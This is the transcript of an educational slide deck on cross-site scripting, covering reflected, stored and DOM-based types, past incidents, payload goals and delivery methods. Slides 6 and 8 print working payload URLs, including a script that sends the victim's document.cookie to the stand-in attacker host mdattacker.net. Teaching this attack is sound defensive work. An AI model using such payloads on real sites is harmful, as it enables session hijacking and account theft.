1 / 20

Chapter 12: Attacking Users: Cross-Site Scripting

Chapter 12: Attacking Users: Cross-Site Scripting. Presented By: Chandra Kollipara. Cross-Site Scripting:. Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites.

kera
Download Presentation

Chapter 12: Attacking Users: Cross-Site Scripting

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Chapter 12: Attacking Users: Cross-Site Scripting Presented By: Chandra Kollipara

  2. Cross-Site Scripting: • Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. • Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user

  3. “Users get compromised because they are not security-conscious” • “You can’t own a web application via XSS.”

  4. Types of XSS: • Reflected • Stored • DOM-based

  5. Reflected XSS: http://mdsec.net/error/5/Error.ashx?message=Sorry%2c+an+error+occurred

  6. http://mdsec.net/error/5/Error.ashx?message=<script>alert(1)</script>http://mdsec.net/error/5/Error.ashx?message=<script>alert(1)</script>

  7. Exploiting the vulnerability

  8. http://mdsec.net/error/5/Error.ashx?message=<script>var+i=new+Image;+i.src=”http://mdattacker.net/”%2bdocument.cookie;</script>http://mdsec.net/error/5/Error.ashx?message=<script>var+i=new+Image;+i.src=”http://mdattacker.net/”%2bdocument.cookie;</script> • var i=new Image; i.src=”http://mdattacker.net/”+ document.cookie;

  9. Q. Why doesn’t the attacker simply host a malicious script on mdattacker.net and feed the user a direct link to this script?

  10. Stored XSS Vulnerability: • Data submitted by one user is stored in the application (typically in a back-end database) and then is displayed to other users without being filtered or sanitized appropriately. It involves two requests: • The attacker posts some crafted data containing malicious code that the application stores. • A victim views a page containing the attacker’s data, and the malicious code is executed when the script is executed in the victim’s browser.

  11. DOM-based XSS Vulnerability: • DOM-based XSS vulnerabilities are more similar to reflected XSS bugs than to stored XSS bugs. • Their exploitation typically involves an attacker’s inducing a user to access a crafted URL containing malicious code. • The server’s response to that specific request causes the malicious code to be executed.

  12. XSS Attacks in Action: • In 2010, the Apache Foundation was compromised via a reflected XSS attack within its issue-tracking application. http://blogs.apache.org/infra/entry/apache_org_04_09_2010 • In 2005, the social networking site MySpace was found to be vulnerable to a stored XSS attack. http://namb.la/popular/tech.html • In 2009, Twitter fell victim to two XSS worms. www.cgisecurity.com/2009/04/two-xss-worms-slam-twitter.html http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-andsomething.html

  13. Payload for XSS Attacks: • It involves capturing a victim’s session token, hijacking her session, and thereby making use of the application “as” the victim, performing arbitrary actions and potentially taking ownership of that user’s account. • Virtual Defacement • Injecting Trojan Functionality • Inducing user actions

  14. Virtual Defacement

  15. Injecting Trojan functionality

  16. Delivery Mechanisms • In a targeted attack, a forged e-mail may be sent to a single target user or a small number of users • A URL can be fed to a target user in an instant message. • Content and code on third-party websites can be used to generate requests that trigger XSS flaws • Many web applications implement a function to “tell a friend” or send feedback to site administrators.

  17. For Stored XSS: • The two kinds of delivery mechanisms for stored XSS attacks are in-band and out-of-band. • In-band delivery applies in most cases and is used when the data that is the subject of the vulnerability is supplied to the application via its main web interface. • Out-of-band delivery applies in cases where the data that is the subject of the vulnerability is supplied to the application through some other channel

  18. Thank You Questions?

More Related